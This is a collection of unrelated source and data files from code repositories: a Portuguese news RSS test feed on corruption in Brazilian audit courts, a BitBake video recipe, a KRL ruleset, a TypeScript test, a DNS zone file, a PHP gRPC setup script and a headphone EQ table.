<a href='https://apublica.org/imagem10-6/'><img width="1200" height="800" src="https://apublica.org/wp-content/uploads/2018/06/Imagem10.jpg" class="attachment-full size-full" alt="" srcset="https://apublica.org/wp-content/uploads/2018/06/Imagem10.jpg 1200w, https://apublica.org/wp-content/uploads/2018/06/Imagem10-800x533.jpg 800w" sizes="(max-width: 1200px) 100vw, 1200px" /></a> <a href='https://apublica.org/2018/06/quem-fiscaliza-os-tribunais-de-contas/imagem09/'><img width="1200" height="800" src="https://apublica.org/wp-content/uploads/2018/06/Imagem09.jpg" class="attachment-full size-full" alt="" srcset="https://apublica.org/wp-content/uploads/2018/06/Imagem09.jpg 1200w, https://apublica.org/wp-content/uploads/2018/06/Imagem09-800x533.jpg 800w" sizes="(max-width: 1200px) 100vw, 1200px" /></a> <a href='https://apublica.org/imagem08/'><img width="1200" height="800" src="https://apublica.org/wp-content/uploads/2018/06/Imagem08.jpg" class="attachment-full size-full" alt="" srcset="https://apublica.org/wp-content/uploads/2018/06/Imagem08.jpg 1200w, https://apublica.org/wp-content/uploads/2018/06/Imagem08-800x533.jpg 800w" sizes="(max-width: 1200px) 100vw, 1200px" /></a><p><span style="font-weight: 400;">Em fevereiro, Fernando Pimentel decidiu desativar o Palácio Tiradentes, um dos prédios da Cidade Administrativa, onde o governador despachava. De acordo com Pimentel, a medida trará uma economia de 40% nos gastos com insumos diversos, manutenção rotineira e com o consumo de água e energia. O PSDB rebateu a decisão do petista e garantiu que a centralização da estrutura governamental naquele espaço gerou uma economia de R$ 590 milhões aos cofres públicos entre 2011 e 2015. </span></p><p><span style="font-weight: 400;">Passados 17 anos do lançamento do edital da Cidade Administrativa, o TCE de Minas instaurou, em abril de 2017, um procedimento para investigar se houve fraude no contrato. A medida foi tomada depois que a Procuradoria-Geral da República abriu inquérito para averiguar a existência de crimes envolvendo Aécio Neves na obra. A iniciativa para a investigação partiu do Ministério Público de Contas.</span></p> <figure id="attachment_47866" aria-describedby="figcaption_attachment_47866" class="wp-caption alignnone" itemscope itemtype="http://schema.org/ImageObject"><div class="imageAndSource"><div class='inline-image-source image-source p-1 text-right'>Gustavo Baxter/Agência Pública</div><img itemprop="contentURL" class="wp-image-47866 size-full" src="https://apublica.org/wp-content/uploads/2018/06/teto-predio-minas-1.jpg" alt="" width="1200" height="800" srcset="https://apublica.org/wp-content/uploads/2018/06/teto-predio-minas-1.jpg 1200w, https://apublica.org/wp-content/uploads/2018/06/teto-predio-minas-1-800x533.jpg 800w" sizes="(max-width: 1200px) 100vw, 1200px" /></div><figcaption id="figcaption_attachment_47866" class="wp-caption-text caption" itemprop="description">Em 2015, um vendaval arrancou parte do teto do prédio</figcaption></figure><p><span style="font-weight: 400;">A </span><b>Pública</b><span style="font-weight: 400;"> entrou em contato com as assessorias de imprensa do senador Aécio Neves e do Tribunal de Contas de Minas, que não deram retorno.</span></p><h3><b>Ministério Público </b></h3><p><span style="font-weight: 400;">Além de atuarem como auxiliares dos tribunais de contas no controle e na fiscalização da execução do orçamento e dos atos de gestão dos recursos públicos, os membros do Ministério Público de Contas podem apresentar uma denúncia à corte de contas para que irregularidades sejam apuradas e os gestores, responsabilizados. </span><span style="font-weight: 400;">Os pareceres dos procuradores de contas, servidores concursados com carreira de bacharel em direito, são opinativos. Ou seja, eles não têm o poder de vetar as decisões dos conselheiros, que podem acatar ou não suas recomendações, tendo apenas como ferramenta o recurso para que as decisões sejam revistas. </span></p><p><span style="font-weight: 400;">Nunca na história do TCE de Minas, por exemplo, houve reprovação das contas de um governador. Mesmo quando os procuradores de contas alertaram para problemas graves. Em 2013, <a href="https://apublica.org/wp-content/uploads/2018/06/CONTAS-TCE-MG-2013.pdf" target="_blank" rel="noopener">o Ministério Público de Contas advertiu</a></span><span style="font-weight: 400;"> que o estado não cumpriu o mínimo constitucional para a educação, de 25% da receita, tendo aplicado apenas 23,91%. Isso não impediu, no entanto, que os <a href="https://www.tce.mg.gov.br/TCE-aprova-contas-do-Governador-e-faz-recomendacoes-.html/Noticia/1111621092" target="_blank" rel="noopener">conselheiros aprovassem as contas</a> do ex-governador Antonio Anastasia, argumentando que o gestor havia cumprido os índices constitucionais.</span></p><h3><b><a id="Link3"></a>13 conselheiros afastados em um ano</b></h3><p><span style="font-weight: 400;">O descumprimento da aplicação mínima constitucional de 15% da receita para a saúde foi um dos principais argumentos dos conselheiros do TCE do Rio para a rejeição do balanço financeiro de 2016 do governador Luiz Fernando Pezão (MDB). A última vez que o TCE havia emitido parecer contrário às contas do estado fora em 2003. A decisão contrária a Pezão se deu em maio do ano passado. “O colegiado que deliberou pela rejeição das contas em 2016 foi integrado por conselheiros suplentes, tendo em vista o afastamento dos titulares por ordem judicial (IPL 1133/DF – Operação Quinto do Ouro). Note-se que em anos anteriores (2007-2015) o número de inconsistências foi até maior. Ainda assim as contas eram sistematicamente aprovadas com parecer favorável do TCE, numa evidente demonstração de que o controle era meramente formal e de que existia uma estratégia de proteção mútua entre os órgãos”, alertou o Ministério Público Federal (MPF) no <a href="https://drive.google.com/open?id=1RCBgCy8OFNISOumywjGBTWnSIZht8EvM" target="_blank" rel="noopener">documento que justifica a <strong>Operação Cadeia Velha</strong></a></span><span style="font-weight: 400;">, que revelou um esquema de corrupção na Assembleia Legislativa do Rio de Janeiro.</span></p><p><span style="font-weight: 400;">Apesar da recomendação do TCE, a Assembleia do Rio aprovou, em setembro de 2017, a movimentação financeira do governador. A população e os servidores do estado, que convivem com salários atrasados, foram proibidos de participar da votação. À época, o Legislativo fluminense justificou que a decisão</span><i><span style="font-weight: 400;"> </span></i><span style="font-weight: 400;">foi tomada pela presidência, por recomendação da segurança da Casa, “amparada em informações de que poderia haver atos violentos nos protestos”. </span><span style="font-weight: 400;">Dois meses depois da reunião, Pezão indicou para o conselho da corte Edson Albertassi (MDB), então presidente da Comissão de Orçamento, Finanças, Fiscalização Financeira e Controle da Alerj, que também tinha dado aval à sua prestação de contas. </span></p><p><span style="font-weight: 400;">“Os fatos, no entanto, demonstraram que a argumentação de Albertassi não passou de mera retórica para justificar a proteção ao governo cujas contas, se tivessem sido rejeitadas, poderiam levar à responsabilização pessoal do governador”, observaram os procuradores no documento. Ex-líder do governo na Assembleia, Albertassi foi preso na Operação Cadeia Velha, antes de assumir a vaga no TCE. Ainda de acordo com o MPF, “desde 2007 e durante toda a administração de Sérgio Cabral, houve razões de sobra para a reprovação das contas do governo, contudo, como o processo de fiscalização sempre esteve viciado, em momento algum o ex-governador esteve sob o risco de se ver submetido ao processo político de impedimento”.</span></p><p><span style="font-weight: 400;">Há suspeitas de que durante o governo de Cabral cinco dos sete conselheiros do tribunal – </span><span style="font-weight: 400;">Aloysio Guedes, Domingos Brazão, Marco Antônio de Alencar, José Gomes Graciosa e José Maurício Nolasco </span><span style="font-weight: 400;">– participaram de um esquema de cobrança de propina para fechar os olhos para os contratos entre empreiteiras e o governo. A Operação Quinto do Ouro, da PF, que revelou o esquema, teve como base a delação premiada do ex-presidente do TCE Jonas Lopes. Os cinco conselheiros foram presos temporariamente em 29 de março de 2017 e soltos em 7 de abril, mas seguem afastados de suas funções desde então. O TCE do Rio afirmou, por meio de nota, que não irá comentar sobre o assunto. A reportagem não conseguiu contato com a defesa dos conselheiros afastados.</span></p><p><span style="font-weight: 400;">Apenas no último ano, pelo menos 13 conselheiros foram afastados de seus cargos com suspeitas de estarem envolvidos em esquemas de corrupção. </span></p><p><span style="font-weight: 400;">No Mato Grosso também foram afastados cinco conselheiros. Eles são suspeitos de ter recebido R$ 53 milhões em propinas para não prejudicar o andamento das obras da Copa no estado. O esquema foi revelado em delação do ex-governador Silval Barbosa (MDB) durante a Operação Malebolge, da PF. </span><span style="font-weight: 400;">Os conselheiros Valter Albano, Antônio Joaquim, José Carlos Novelli, Waldir Júlio Teis e Sérgio Ricardo de Almeida foram afastados em setembro do ano passado pelo STF. A Malebolge é uma sequência da Operação Ararath, que desde 2013 investiga um suposto esquema de lavagem de dinheiro público e crimes financeiros no Mato Grosso. </span></p><p><span style="font-weight: 400;">À reportagem, o TCE do Mato Grosso informou, por meio da assessoria de imprensa, que houve uma investigação interna em </span><span style="font-weight: 400;">outubro de 2016. “A investigação foi conduzida por dois conselheiros substitutos e um procurador do Ministério Público de Contas, com conclusão em março de 2017”, observou o órgão. “Não chegou a nenhuma evidência de crime, mas mesmo assim a comissão responsável entendeu por bem encaminhar cópias dos autos para os Ministérios Públicos Federal e Estadual”, diz a <a href="https://apublica.org/wp-content/uploads/2018/06/Nota-TCE-MT.pdf" target="_blank" rel="noopener">nota</a>.</span></p><p><a href="http://apublica.org/2018/06/o-que-dizem-os-citados-na-reportagem/" target="_blank" rel="noopener">Leia o que dizem os conselheiros</a></p><p><span style="font-weight: 400;">No Espírito Santo, o conselheiro José Antônio Almeida Pimentel foi acusado de receber dinheiro em troca de facilitação e favorecimento para a aprovação de processos perante a corte de contas do Estado. As investigações revelaram também que ele teria oferecido expertise e apoio técnico no direcionamento de processos licitatórios em diversos municípios capixabas. José Antônio é alvo da Operação Moeda de Troca, deflagrada em 2010, que apura fraudes em licitações de municípios no Espírito Santo. Ele saiu do cargo, por decisão do STJ, em junho do ano passado. </span></p><p><span style="font-weight: 400;">A defesa argumentou ao STF que a denúncia contra José Antônio Pimentel seria inepta, principalmente por ausência de justa causa relativa aos crimes de lavagem de dinheiro e organização criminosa. Os fatos imputados ao denunciado, de acordo com a defesa, não estariam especificados.</span></p><p><span style="font-weight: 400;">O conselheiro do TCE do Amapá José Júlio de Miranda Coelho foi igualmente afastado de suas funções em março de 2018 pelo STJ. Ele é acusado de ter cometido 62 vezes o crime de lavagem de dinheiro com uso de terceiros. </span></p><p><span style="font-weight: 400;">José Júlio tinha sido afastado em 2015 e voltou ao cargo em dezembro de 2017 por decisão do STF. Diante do novo processo de afastamento, a defesa de Coelho alegou que, diante da reintegração promovida pela Suprema Corte, não havia fato recente que justificasse o novo pedido de afastamento feito pelo Ministério Público Federal. Mas ele foi afastado mesmo assim.</span></p><h3><b>Bom relacionamento e parentesco</b></h3><p><span style="font-weight: 400;">A relação de cumplicidade entre o órgão de controle e seu controlado é um dos principais motivos da corrupção nos tribunais de contas, de acordo com o procurador Júlio Marcelo de Oliveira. “O político que ocupa a cadeira de conselheiro terá, na maioria dos casos, uma visão mais simpática ao seu grupo político. O desenho institucional atual é vulnerável à captura política”, acrescentou. </span></p><p><span style="font-weight: 400;">“É com muita tranquilidade e serenidade que eu afirmo que este governo do estado do Rio de Janeiro, com suas finanças públicas, seus controles públicos, faz uma nova era do estado. Nós que cuidamos das contas do estado sentimos claramente a mudança radical que houve na Secretaria de Fazenda”, afirmou o então presidente do TCE do Rio de Janeiro José Maurício Nolasco durante a abertura do </span><span style="font-weight: 400;">IV Encontro do Conselho Nacional dos Órgãos de Controle Interno,</span><span style="font-weight: 400;"> que ocorreu em 2009. Anos depois, ele seria investigado na Operação Quinto do Ouro, já mencionada anteriormente. </span></p><p><span style="font-weight: 400;">“Da parte do Tribunal de Contas de Goiás e do nosso governo, o que tem ocorrido invariavelmente é uma relação harmônica, porque há, acima de tudo, uma identidade de propósitos”, afirmou o então governador de Goiás Marconi Perillo (PSDB) durante a inauguração de uma nova sede do TCE, em agosto de 2016. </span><span style="font-weight: 400;">Perillo é acusado de ter formado uma aliança com o dono da construtora Delta, Fernando Cavendish, e com o bicheiro Carlinhos Cachoeira para receber vantagens indevidas em troca de contratos com o governo goiano que causaram prejuízos aos cofres públicos. Em nota enviada à imprensa quando denunciado ao STJ, em março de 2017, ele negou as acusações. Assim que deixou a vaga para disputar a reeleição, em abril, o governador que o substituiu, José Eliton (PSDB), indicou o cunhado de seu antecessor, Sérgio Cardoso, ao conselho do Tribunal de Contas dos Municípios do Estado de Goiás</span><span style="font-weight: 400;">. (<a href="https://apublica.org/wp-content/uploads/2018/06/Nota-TCE-GO.pdf" target="_blank" rel="noopener">Veja a íntegra da nota do TCE-GO</a>)</span></p><p><span style="font-weight: 400;">O levantamento da ONG Transparência Brasil mostrou também que 32% dos conselheiros têm relações de parentesco com políticos. “As relações são diversas e demonstram, em alguns casos, laços com figuras influentes na política local há diversas gerações. Em um caso, o poder remonta ao período imperial: o clã político cearense Paula Pessoa, ao qual pertence o conselheiro Luís Alexandre Albuquerque Figueiredo de Paula Pessoa, do TCE do Ceará, conta com oito gerações de políticos influentes. O conselheiro, além de ter de pai, irmão e sobrinho na política subnacional, tem como antepassado um senador do Império”, observou a ONG no estudo. </span></p><p><a href="https://apublica.org/2018/06/o-que-dizem-os-citados-na-reportagem/">Leia também: Veja o que dizem os mencionados na reportagem</a></p><p><span style="font-weight: 400;">O movimento #MudaTC, criado pela entidade presidida pelo procurador junto ao TCU, </span><span style="font-weight: 400;">Júlio Marcelo de Oliveira</span><span style="font-weight: 400;">, a Ampcon, a Confederação Nacional das Carreiras Típicas de Estado (Conacate) e a Federação Nacional das Entidades dos Servidores dos Tribunais de Contas do Brasil (Fenastc), depois do escândalo no TCE do Rio, apoia a aprovação da <a href="http://www.camara.gov.br/proposicoesWeb/prop_mostrarintegra?codteor=1161004&filename=PEC+329/2013" target="_blank" rel="noopener">PEC 329/2013</a></span><span style="font-weight: 400;">, que está pronta para ir a plenário.</span></p> <figure id="attachment_47868" aria-describedby="figcaption_attachment_47868" class="wp-caption alignnone" itemscope itemtype="http://schema.org/ImageObject"><div class="imageAndSource"><div class='inline-image-source image-source p-1 text-right'>Gustavo Baxter/Agência Pública</div><img itemprop="contentURL" class="wp-image-47868 size-full" src="https://apublica.org/wp-content/uploads/2018/06/palácio-tiradentes.jpg" alt="" width="1200" height="800" srcset="https://apublica.org/wp-content/uploads/2018/06/palácio-tiradentes.jpg 1200w, https://apublica.org/wp-content/uploads/2018/06/palácio-tiradentes-800x533.jpg 800w" sizes="(max-width: 1200px) 100vw, 1200px" /></div><figcaption id="figcaption_attachment_47868" class="wp-caption-text caption" itemprop="description">Rachaduras a caminho do Palácio Tiradentes</figcaption></figure><p><span style="font-weight: 400;">Entre os principais pontos está a mudança na composição dos tribunais de contas, proibindo indicações políticas. O projeto prevê também que os conselheiros sejam fiscalizados pelo Conselho Nacional de Justiça, assim como todos os juízes, desembargadores e ministros do STF e do STJ. </span></p><p><span style="font-weight: 400;">Já a Associação dos Membros dos Tribunais de Contas do Brasil (Atricon) defende que seja criado um Conselho Nacional dos Tribunais de Contas para fiscalizar as cortes de contas. Em relação à composição dos tribunais, o presidente da entidade, Fábio Nogueira, explica que a associação não é contra a indicação de políticos à vaga. “</span><span style="font-weight: 400;">Nós não temos nenhum preconceito contra aqueles que vêm do Parlamento. O que nós precisamos é ter cautela nas indicações”, defendeu. </span></p><p><span style="font-weight: 400;">A proposta de mudanças da Atricon está na <a href="https://www25.senado.leg.br/web/atividade/materias/-/materia/129565" target="_blank" rel="noopener">PEC 22/2017</a>. Ela foi formulada e sugerida pela entidade e apresentada pelo senador Cássio Cunha (PSDB-PB). O projeto assegura a maior parte dos assentos aos membros das carreiras técnicas – cinco no TCU e quatro nos outros tribunais. E prevê o fim das indicações livres do chefe do Executivo e a redução das indicações do Legislativo, fixando critérios como quarentena de três anos afastado de mandato eletivo, não ter sido condenado judicialmente nem ter tido contas reprovadas. </span></p><p><span style="font-weight: 400;">Além disso, a PEC determina que os conselheiros deverão ter graduação e experiências nas áreas jurídica, contábil, econômica e financeira ou de administração pública. Atualmente, apesar de a Constituição exigir “</span><span style="font-weight: 400;">notórios conhecimentos jurídicos, contábeis, econômicos, financeiros ou de administração pública”</span><span style="font-weight: 400;">, há conselheiros de diversas áreas e sem ensino superior nas cadeiras de tribunais de contas estaduais. De acordo com <a href="https://apublica.org/wp-content/uploads/2018/06/Estudo-perfil-dos-TCEs-Artigo-Congresso-Prolatino-Portugal.pdf" target="_blank" rel="noopener">estudo do perfil desses tribunais</a> publicado em 2014 pelo contador Alexandre Bossi, que também é professor do Centro Universitário UNA em Belo Horizonte, esse grupo chega a 23% dos conselheiros. A pesquisa dele abrangeu o TCU, os 26 tribunais estaduais e o do Distrito Federal. </span></p> ]]></content:encoded> <wfw:commentRss>https://apublica.org/2018/06/quem-fiscaliza-os-tribunais-de-contas/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>O que dizem os citados na reportagem</title><link>https://apublica.org/2018/06/o-que-dizem-os-citados-na-reportagem/</link> <comments>https://apublica.org/2018/06/o-que-dizem-os-citados-na-reportagem/#respond</comments> <pubDate>Thu, 14 Jun 2018 16:54:47 +0000</pubDate> <dc:creator><![CDATA[Alice Maciel]]></dc:creator> <category><![CDATA[Português]]></category> <category><![CDATA[corrupção]]></category> <category><![CDATA[lava-jato]]></category> <category><![CDATA[TCU]]></category><guid isPermaLink="false">http://apublica.org/?p=47872</guid> <description><![CDATA[Respostas obtidas pela reportagem da Pública sobre membros de TCEs acusados em escândalos de corrupção]]></description> <content:encoded><![CDATA[<div><p>A reportagem da Pública tentou contato com todos os acusados e mencionados na reportagem. Os TCEs do Rio de Janeiro e Minas Gerais e o TCM da Bahia afirmaram por nota que não se pronunciariam. Abaixo, listamos o posicionamento dos tribunais de contas do Paraná, Rio Grande do Norte e dos conselheiros mencionados:</p><p><strong>TCE- PR: </strong>O Tribunal de Contas do Paraná informou, por meio de sua assessoria de imprensa, que desde 2011 vem realizando auditorias nas empresas concessionárias de rodovias, já tendo encontrado variações de até 25% a mais no preço cobrado por algumas das empresas. Segundo o TCE-PR, as contas do<br /> governador Carlos Alberto Richa relativas ao exercício de 2016 foram aprovadas em novembro de 2017 com 14 ressalvas, nove determinações e três recomendações ao Poder Executivo estadual. (<a href="https://apublica.org/wp-content/uploads/2018/06/Nota-TCE-PR-1.pdf" target="_blank" rel="noopener">Veja nota</a>)</p><p><strong>TCE-RN:</strong> O Tribunal de Contas do Rio Grande do Norte afirmou, por meio de sua assessoria de imprensa, que não houve mudança de entendimento do órgão no processo envolvendo a fiscalização das obras da Arena das Dunas. (<a href="https://apublica.org/wp-content/uploads/2018/06/Nota-TCE-RN.pdf" target="_blank" rel="noopener">Veja nota</a>)</p></div><p><b>Ex-ministro Mário Negromonte:</b> <span style="font-weight: 400;">A defesa de Mário Negromonte alega, no processo, que o inquérito não apresenta conteúdo probatório capaz de demonstrar, de forma definitiva, a existência de ato ilícito por ele praticado. </span></p><p><b>Senador Agripino Maia:</b> <span style="font-weight: 400;">A assessoria de imprensa do senador Agripino Maia não retornou o contato feito pela reportagem. Quando o STF o tornou réu, em dezembro de 2017, ele enviou nota à imprensa dizendo ter causado “estranheza” o fato de não ter sido considerado pelo tribunal o “farto conjunto de provas” de sua “completa inocência”. “Como afirmado por todos os ministros da Primeira Turma, o prosseguimento das investigações não significa julgamento condenatório. E é justamente a inabalável certeza da minha inocência que me obriga a pedir à Corte o máximo de urgência no julgamento final da causa”, afirmou o parlamentar por meio de sua assessoria de imprensa.</span></p><p><b>Advogado </b><b>Tiago Cedraz</b><span style="font-weight: 400;">: </span><span style="font-weight: 400;">O advogado Tiago Cedraz, por meio de sua assessoria de imprensa, negou qualquer ilegalidade e reiterou sua tranquilidade quanto aos fatos mencionados por jamais ter participado de conduta ilícita.</span></p><p><b>Conselheiros afastados do Tribunal de Contas do Mato Grosso:</b></p><p><b>Valter Albano:</b><span style="font-weight: 400;"> Em nota enviada à imprensa quando afastado, o conselheiro Valter Abano afirmou que nunca se omitiu nem agiu de forma ilícita no exercício de suas funções, nem pessoalmente nem por pessoa autorizada por ele. “Em meus 45 anos de vida pública nunca fui condenado em nenhum processo, de qualquer natureza, especialmente por fatos que denegrissem minha honra e minha integridade”, disse. E acrescentou: “Repudio o afastamento do cargo tão somente com base em delações sem nenhuma prova para corroborá-las, confio na Justiça e tenho a certeza de que o tempo e as investigações irão demonstrar a veracidade dos fatos”.</span></p><p><b>Antônio Joaquim:</b><span style="font-weight: 400;"> No processo, a defesa do conselheiro Antônio Joaquim argumentou que seu afastamento foi baseado apenas em delações premiadas e que não há provas contra os conselheiros. “Assim, na tentativa de emplacar sua colaboração premiada, os colaboradores apontam fatos manifestamente inverídicos ao Requerente, sem apresentar quaisquer dados de corroboração, a fim de meramente conferir arrimo à delação ao acusar o Requerente, pessoa que sempre agiu dentro dos ditames da moralidade, da probidade e da honestidade, verificando-se o completo esvaziamento da delação em tela em relação a ele, conforme será a seguir esclarecido”, acrescentou.</span></p><p><b>José Carlos Novelli</b><span style="font-weight: 400;">: Em nota enviada à imprensa quando afastado, a defesa de José Carlos Novelli afirmou que não foram apresentadas provas de atos ilícitos contra o conselheiro e considerou o afastamento desproporcional. “Não há o que falar sobre recebimento de propina e outros benefícios por parte do conselheiro Novelli. Qualquer afirmação contrária é leviana e criminosa”, diz.</span></p><p><b>Waldir Júlio Teis:</b><span style="font-weight: 400;"> No processo, a defesa de Walter Júlio Teis argumentou que não há provas contra ele. “Ao ler as denúncias aduzidas pelos colaboradores, não encontrou qualquer ato concreto de participação do conselheiro Waldir Julio Teis, nos atos supostamente ilícitos investigados nessa quadra, mas, tão somente, meras declarações unilaterais dos colaboradores, não tendo o condão de albergar uma medida tão drástica, como a aqui vergastada”, afirmou a defesa. </span></p><p><b>Sérgio Ricardo de Almeida:</b><span style="font-weight: 400;"> A reportagem não conseguiu localizar a defesa do conselheiro afastado Sérgio Ricardo de Almeida. </span></p> ]]></content:encoded> <wfw:commentRss>https://apublica.org/2018/06/o-que-dizem-os-citados-na-reportagem/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> </channel> </rss> | Org | 2 | hsantos9/Winds | api/test/data/feed/apublica.org | [
"BSD-3-Clause"
] |
SUMMARY = "Big Buck Bunny - 360p VP9 webm"
LICENSE = "CC-BY-3.0"
LIC_FILES_CHKSUM = "file://${COREBASE}/meta/files/common-licenses/CC-BY-3.0;md5=dfa02b5755629022e267f10b9c0a2ab7"
SRC_URI = "https://upload.wikimedia.org/wikipedia/commons/transcoded/c/c0/Big_Buck_Bunny_4K.webm/Big_Buck_Bunny_4K.webm.360p.vp9.webm"
SRC_URI[md5sum] = "3f5b3b10f69a1676b17317530ff9e1cb"
SRC_URI[sha256sum] = "492f23f851afe0c570e5d2c436a9085b5c718d5bec5d31d4e66ebe308336ef00"
inherit allarch
do_install() {
install -d ${D}${datadir}/movies
install -m 0644 ${WORKDIR}/Big_Buck_Bunny_4K.webm.360p.vp9.webm ${D}${datadir}/movies/
}
FILES_${PN} += "${datadir}/movies"
| BitBake | 3 | hito0512/Vitis-AI | dsa/XVDPU-TRD/vck190_platform/petalinux/xilinx-vck190-base-trd/project-spec/meta-base-trd/recipes-multimedia/sample-content/bigbuckbunny-360p-vp9-webm.bb | [
"Apache-2.0"
] |
ruleset html {
meta {
provides header, footer
shares __testing
}
global {
__testing = { "queries":
[ { "name": "__testing" }
//, { "name": "entry", "args": [ "key" ] }
] , "events":
[ //{ "domain": "d1", "type": "t1" }
//, { "domain": "d2", "type": "t2", "attrs": [ "a1", "a2" ] }
]
}
header = function(title,scripts) {
<<<!DOCTYPE HTML>
<html>
<head>
<title>#{title}</title>
<meta charset="UTF-8">
#{scripts.defaultsTo("")}
</head>
<body>
>>
}
footer = function() {
<< </body>
</html>
>>
}
}
}
| KRL | 4 | Picolab/G2S | krl/html.krl | [
"MIT"
] |
// @noLib: true
/// <reference path='fourslash.ts'/>
// @module: esnext
// @Filename: foo.ts
/////// <reference no-default-lib="true"/>
/////// <reference path='./bar.d.ts' />
////import./**/meta;
////import.[|meta|];
//@Filename: bar.d.ts
////interface ImportMeta {
////}
// @Filename: baz.ts
/////// <reference no-default-lib="true"/>
/////// <reference path='./bar.d.ts' />
////let x = import
//// . // hai :)
//// meta;
verify.baselineFindAllReferences("");
goTo.rangeStart(test.ranges()[0]);
verify.renameInfoFailed();
| TypeScript | 3 | monciego/TypeScript | tests/cases/fourslash/findAllRefsImportMeta.ts | [
"Apache-2.0"
] |
$TTL 36000
example2.com. IN SOA ns1.example2.com. hostmaster.example2.com. (
2005081201 ; serial
28800 ; refresh (8 hours)
1800 ; retry (30 mins)
2592000 ; expire (30 days)
86400 ) ; minimum (1 day)
example2.com. 86400 NS ns1.example2.com.
example2.com. 86400 NS ns2.example2.com.
example2.com. 86400 MX 10 mail1.n2.example2.com.
example2.com. 86400 MX 20 mail2.example2.com.
example2.com. 86400 A 192.168.111.10
example2.com. 86400 A 192.168.111.11
example2.com. 86400 TXT "v=spf1 a:mail.example2.com -all"
ns1.example2.com. 86400 A 192.168.110.10
ns1.example2.com. 86400 A 192.168.110.11
ns2.example2.com. 86400 A 192.168.110.20
mail.example2.com. 86400 A 192.168.120.10
mail2.example2.com. 86400 A 192.168.120.20
www2.example2.com. 86400 A 192.168.100.20
www.example2.com. 86400 CNAME example2.com.
ftp.example2.com. 86400 CNAME example2.com.
webmail.example2.com. 86400 CNAME example2.com. | DIGITAL Command Language | 4 | tgragnato/geneva | tests/DNS/zones/example2.com | [
"BSD-3-Clause"
] |
#!/bin/bash
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -e
default_extension_dir=$(php-config --extension-dir)
if [ ! -e $default_extension_dir/grpc.so ]; then
# the grpc extension is not found in the default PHP extension dir
# try the source modules directory
module_dir=$(pwd)/../ext/grpc/modules
if [ ! -e $module_dir/grpc.so ]; then
echo "Please run 'phpize && ./configure && make' from ext/grpc first"
exit 1
fi
# sym-link in system supplied extensions
for f in $default_extension_dir/*.so; do
ln -s $f $module_dir/$(basename $f) &> /dev/null || true
done
extension_dir="-d extension_dir=${module_dir} -d extension=grpc.so"
else
extension_dir="-d extension=grpc.so"
fi
| Shell | 4 | samotarnik/grpc | src/php/bin/determine_extension_dir.sh | [
"Apache-2.0"
] |
frequency,raw,error,smoothed,error_smoothed,equalization,parametric_eq,fixed_band_eq,equalized_raw,equalized_smoothed,target
20.00,-0.64,-2.92,-0.64,-2.92,2.92,2.14,0.72,2.28,2.28,2.28
20.20,-0.59,-2.91,-0.59,-2.91,2.91,2.18,0.74,2.32,2.32,2.32
20.40,-0.54,-2.90,-0.54,-2.90,2.90,2.22,0.77,2.36,2.36,2.36
20.61,-0.49,-2.88,-0.49,-2.88,2.88,2.24,0.79,2.39,2.39,2.39
20.81,-0.44,-2.87,-0.44,-2.86,2.86,2.26,0.81,2.42,2.42,2.43
21.02,-0.38,-2.85,-0.38,-2.84,2.84,2.28,0.84,2.46,2.45,2.47
21.23,-0.33,-2.82,-0.33,-2.82,2.81,2.28,0.86,2.48,2.48,2.49
21.44,-0.28,-2.78,-0.27,-2.78,2.78,2.27,0.89,2.50,2.51,2.51
21.66,-0.22,-2.75,-0.22,-2.75,2.75,2.26,0.92,2.53,2.52,2.53
21.87,-0.17,-2.70,-0.17,-2.71,2.71,2.24,0.94,2.54,2.54,2.54
22.09,-0.12,-2.67,-0.11,-2.67,2.67,2.21,0.97,2.55,2.55,2.56
22.31,-0.06,-2.62,-0.06,-2.63,2.63,2.18,1.00,2.57,2.56,2.57
22.54,-0.01,-2.58,-0.01,-2.58,2.58,2.13,1.03,2.57,2.57,2.57
22.76,0.04,-2.54,0.05,-2.54,2.54,2.09,1.06,2.58,2.58,2.58
22.99,0.10,-2.48,0.10,-2.49,2.49,2.03,1.09,2.59,2.59,2.58
23.22,0.15,-2.44,0.15,-2.44,2.45,1.97,1.13,2.60,2.60,2.59
23.45,0.20,-2.40,0.20,-2.40,2.41,1.91,1.16,2.61,2.61,2.60
23.69,0.25,-2.36,0.25,-2.36,2.36,1.85,1.19,2.61,2.62,2.61
23.92,0.30,-2.32,0.31,-2.32,2.32,1.79,1.23,2.62,2.63,2.62
24.16,0.36,-2.28,0.36,-2.28,2.28,1.72,1.26,2.64,2.64,2.64
24.40,0.41,-2.25,0.41,-2.24,2.24,1.65,1.30,2.65,2.65,2.66
24.65,0.46,-2.20,0.47,-2.20,2.20,1.59,1.33,2.66,2.66,2.66
24.89,0.52,-2.15,0.52,-2.15,2.15,1.52,1.37,2.68,2.67,2.67
25.14,0.57,-2.11,0.57,-2.11,2.11,1.46,1.40,2.68,2.68,2.68
25.39,0.62,-2.07,0.63,-2.07,2.07,1.39,1.44,2.69,2.69,2.69
25.65,0.68,-2.03,0.68,-2.03,2.02,1.33,1.47,2.70,2.70,2.71
25.91,0.73,-1.98,0.73,-1.98,1.98,1.27,1.51,2.71,2.71,2.71
26.16,0.78,-1.94,0.79,-1.93,1.94,1.21,1.54,2.72,2.72,2.72
26.43,0.84,-1.89,0.84,-1.89,1.89,1.16,1.58,2.73,2.73,2.73
26.69,0.89,-1.85,0.89,-1.85,1.85,1.11,1.61,2.74,2.74,2.74
26.96,0.94,-1.82,0.94,-1.81,1.81,1.05,1.64,2.75,2.75,2.76
27.23,0.99,-1.77,0.99,-1.77,1.77,1.00,1.67,2.76,2.76,2.77
27.50,1.05,-1.72,1.05,-1.73,1.72,0.96,1.70,2.77,2.77,2.78
27.77,1.10,-1.67,1.10,-1.68,1.68,0.91,1.73,2.78,2.78,2.77
28.05,1.15,-1.64,1.15,-1.63,1.63,0.87,1.75,2.79,2.79,2.79
28.33,1.20,-1.59,1.20,-1.59,1.59,0.83,1.78,2.79,2.80,2.79
28.62,1.26,-1.54,1.26,-1.54,1.55,0.79,1.80,2.81,2.81,2.80
28.90,1.31,-1.50,1.31,-1.50,1.50,0.75,1.82,2.82,2.81,2.81
29.19,1.36,-1.45,1.36,-1.46,1.46,0.71,1.83,2.82,2.82,2.81
